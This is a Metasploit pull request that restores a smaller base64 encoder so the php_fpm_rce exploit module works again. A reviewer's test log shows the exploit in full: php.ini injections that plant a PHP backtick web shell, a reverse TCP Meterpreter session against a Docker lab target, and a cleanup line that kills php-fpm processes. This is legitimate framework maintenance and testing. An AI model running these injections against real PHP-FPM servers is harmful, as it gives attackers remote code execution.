Skip to content

Comments

Use the smaller base64 encoder#20346

Merged
msutovsky-r7 merged 1 commit intorapid7:masterfrom
zeroSteiner:fix/issue/20310
Jun 27, 2025
Merged

Use the smaller base64 encoder#20346
msutovsky-r7 merged 1 commit intorapid7:masterfrom
zeroSteiner:fix/issue/20310

Conversation

@zeroSteiner
Copy link
Contributor

@zeroSteiner zeroSteiner commented Jun 24, 2025

This fixes the php_fpm_rce module which stopped working against the docker target from the original PR (#12863) when #19420 was landed. #19420 added a new encoder that increases the size of the payload more than the older base64 one. Now the php_fpm_rce module can't exactly have a spare requirement because it depends on the target, so in this case it makes more sense to just prefer the older encoder that yields smaller payloads.

Fixes #20310, supersedes #20311.

Testing

@smcintyre-r7 smcintyre-r7 added bug easy rn-fix release notes fix labels Jun 24, 2025
@msutovsky-r7 msutovsky-r7 self-assigned this Jun 27, 2025
msutovsky-r7
msutovsky-r7 approved these changes Jun 27, 2025
View reviewed changes
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

msf6 exploit(multi/http/php_fpm_rce) > run verbose=true
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Sending baseline query...
[*] Base status code is 200
[*] Detecting QSL...
[*] Status code 502 for qsl=1765, adding as a candidate
[+] The target is probably vulnerable. Possible QSLs: [1765]
[*] Extended QSL list: [1755, 1760, 1765]
[*] Doing sanity check...
[*] Detecting attack parameters...
[*] send_params_detection: try #1
[*] Iterating until the PHP option is enabled (session.auto_start=1)...
[*] Attack params found, disabling PHP option (session.auto_start=0)...
[+] Parameters found: QSL=1760, customh_length=13
[+] Target is vulnerable!
[*] Performing attack using php.ini settings...
[*] send_attack_chain: try #1
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[*] send_attack_chain: try #2
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[*] send_attack_chain: try #3
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[*] send_attack_chain: try #4
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[*] send_attack_chain: try #5
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[*] send_attack_chain: try #6
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=j
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/j
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[W]`?>"
[+] Success! Was able to execute a command by appending 'which which'
[*] Trying to cleanup /tmp/j...
[*] send_backdoor_cleanup: try #1
[*] send_backdoor_cleanup: try #2
[*] send_backdoor_cleanup: try #3
[*] send_backdoor_cleanup: try #4
[*] send_backdoor_cleanup: try #5
[+] Cleanup done!
[*] Sending payload...
[*] send_payload: try #1
[*] send_payload: try #2
[*] send_payload: try #3
[*] send_payload: try #4
[*] send_payload: try #5
[*] Sending stage (40004 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:51298) at 2025-06-27 17:00:28 +0200

[*] Remove /tmp/j and kill workers...
[*] send_cleanup: try #1
[*] send_cleanup: try #2
[*] send_cleanup: try #3
[*] send_cleanup: try #4
[*] send_cleanup: try #5
[*] send_cleanup: try #6
[*] send_cleanup: try #7
[*] send_cleanup: try #8
[*] send_cleanup: try #9
[*] send_cleanup: try #10
[*] send_cleanup: try #11
[*] send_cleanup: try #12
[*] send_cleanup: try #13
[*] send_cleanup: try #14
[*] send_cleanup: try #15
[*] send_cleanup: try #16
[*] send_cleanup: try #17
[*] send_cleanup: try #18
[*] send_cleanup: try #19
[*] send_cleanup: try #20
[-] Could not cleanup. Run these commands before terminating the session: for p in `pidof php-fpm`; do kill -9 $p;done; rm -f /tmp/j

meterpreter > 
meterpreter > sysinfo 
Computer    : 2dff8bb05736
OS          : Linux 2dff8bb05736 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64
Meterpreter : php/linux

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban Jun 27, 2025
@msutovsky-r7 msutovsky-r7 merged commit 126bff1 into rapid7:master Jun 27, 2025
19 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Jun 27, 2025
@msutovsky-r7
Copy link
Contributor

msutovsky-r7 commented Jun 27, 2025
edited by adfoster-r7
Loading

Release Notes

This fixes an issue with the php_fpm_rce module, which stopped working after adding a new encoder that increased the size of payload. This address this issue and substitutes the original encoder for smaller base64 encoder.

@adfoster-r7
Copy link
Contributor

adfoster-r7 commented Jul 1, 2025

Patched up some of the english in the release notes here 📝

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@msutovsky-r7 msutovsky-r7 msutovsky-r7 approved these changes

Assignees

@msutovsky-r7 msutovsky-r7

Labels

bug easy rn-fix release notes fix

Projects

Metasploit Kanban
Archived in project

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

PHP FPM RCE Exploit no longer functional due to new PHP encoders

4 participants

@zeroSteiner @msutovsky-r7 @adfoster-r7 @smcintyre-r7